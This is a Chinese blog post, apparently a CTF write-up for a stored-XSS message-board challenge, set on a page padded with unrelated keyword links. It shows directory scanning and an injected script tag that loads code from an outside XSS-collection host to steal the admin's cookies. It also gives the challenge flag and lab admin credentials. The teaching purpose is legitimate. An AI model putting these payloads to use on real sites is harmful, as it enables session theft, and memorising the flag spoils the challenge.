当前位置: 首页 > news >正文

美工做的好的网站python做笔记的网站

news 2025/9/18 9:08:51
美工做的好的网站,python做笔记的网站,WordPress实现在线考试,谷歌官方网站题目描述 题目无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台打开场景后界面如下: 解题思路 看到此类的题目,应该和存储型xss有关,也就是将恶意代码保存到服务器端即然在服务器端,那就…

题目描述

在这里插入图片描述

  • 题目无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台
  • 打开场景后界面如下:

在这里插入图片描述

解题思路

  • 看到此类的题目,应该和存储型xss有关,也就是将恶意代码保存到服务器端
  • 即然在服务器端,那就是会在后台弹出窗口了
  • 所以需要找到后台地址,看看能不能爆破进入,但是题目提示了说不需要登录后台,需要使用xss平台来接收cookies

相关工具

  • 目录扫描工具:御剑
  • 或者dirsearch工具:python dirsearch.py -u url
  • url解码:https://www.iamwawa.cn/urldecode.html

解题步骤

  1. 测试一下script代码:
<script>alert(1)</script>

在这里插入图片描述
发现确实可以读取到。

使用目录扫描工具-御剑进行扫描试试
在这里插入图片描述
得到后台管理地址:http://114.67.175.224:10687/admin.php
在这里插入图片描述
账号密码不知道?
需要注意的是:该题目提示了无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台
所以,我们需要找一个xss平台(https://xssaq.com/),目前我找到的这个是免费可用的,其他的都需要付费。
在这里插入图片描述
然后创建一个项目:
在这里插入图片描述

<sCRiPt sRC=//uj.ci/k3a></sCrIpT>

将项目中提供的代码输入留言板中:
在这里插入图片描述
然后,返回项目中查看效果:
在这里插入图片描述
这个时候就获取到cookies了,这就是我们需要的flag,注意记得转码(%7B 和%7D):

flag%7B826066e999f695cacd75a92ac9a0ac09%7D

在这里插入图片描述
所以就得到了falg:

flag{826066e999f695cacd75a92ac9a0ac09}

之前该题目是有个数据库文件db.sql文件,可以直接在扫描目录的时候就得到,内容如下:

# Host: localhost  (Version: 5.5.53)
# Date: 2019-08-04 16:13:22
# Generator: MySQL-Front 5.3  (Build 4.234)/*!40101 SET NAMES utf8 */;#
# Structure for table "text"
#CREATE DATABASE xss DEFAULT CHARACTER SET utf8;
use xss; DROP TABLE IF EXISTS `text`;
CREATE TABLE `text` (`Id` int(11) NOT NULL AUTO_INCREMENT,`text` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "text"
#/*!40000 ALTER TABLE `text` DISABLE KEYS */;
/*!40000 ALTER TABLE `text` ENABLE KEYS */;#
# Structure for table "user"
#DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (`Id` int(11) NOT NULL AUTO_INCREMENT,`username` varchar(255) DEFAULT NULL,`password` varchar(255) DEFAULT NULL,PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;#
# Data for table "user"
#/*!40000 ALTER TABLE `user` DISABLE KEYS */;
INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');
/*!40000 ALTER TABLE `user` ENABLE KEYS */;

可以发现,在最后有一行插入语句:

可以看到INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');

账号admin,密码011be4d65feac1a8

这就是我们需要的账号密码,登入后发现弹出了弹窗:
在这里插入图片描述
但是,我们并没有得到我们想要的falg,那该如何?当然是获取cookies了:
直接F12,查看cookies即可:
在这里插入图片描述
或者直接在留言板中输入获取cookies的代码,在登录后台的时候自动弹出:

<script>alert(document.cookie)</script>

就像这样:
在这里插入图片描述

得到Flag

flag{826066e999f695cacd75a92ac9a0ac09}

在这里插入图片描述

新知识点

  1. 学会使用目录扫描工具
  2. 认识熟悉常见的url编码
http://www.yayakq.cn/news/507358/

相关文章:

  • 网站建设与开发是什么岗位做网站九州科技
  • 昆明市住房和城乡建设局官方网站wordpress 母婴类模板
  • 成品影视app开发制作唐山seo代理商
  • qq刷赞网站推广快速北京h5网页设计
  • 网站建设与管理电子教程网站网站建设
  • 做卖车网站需要什么手续室内装饰设计费收费标准
  • 莆田网站制作价格服装设计网站免费
  • 坂田网站建设公司国家开发公司
  • 河源建设局网站必分享 wordpress主题
  • 自己做的网站跳转到购彩大厅四川省住房和城乡建设厅官网查询
  • 电商网站的支付接入该怎么做呢延安网站建设推广微信网站
  • 百度网站网站建设虚线代码
  • c语言精品网站开发的教学宁波制作网站企业有哪些
  • 沧州做网站的asp网站加速
  • 新手去哪个网站做翻译国外乡村建设网站
  • 手机网站制作架构厦门外贸推广
  • 代备案网站wordpress换头像
  • 河南省建设厅网站地址免费制作的网站
  • 淮南网站开发谷歌商店paypal官网
  • 58网站模板沈阳论坛建站模板
  • 网站设计建设维护与更新福建进入一级战备
  • 建设一个网站项目预算施工企业营销人员培训
  • 新桥企业网站建设做印刷的网站
  • 国内十大网站建设做二手手机的网站有哪些
  • 门户网站建设依据网站模板怎么使用教程
  • 2015年做网站行不行wordpress 做网店
  • 一般网站建设多少钱凡客诚品的经营特色
  • 网业车怎么打车wordpress 手机端优化
  • 网站建设公司顺义成都新冠病最新消息
  • 给人做ppt的网站吗18成年人正能量软件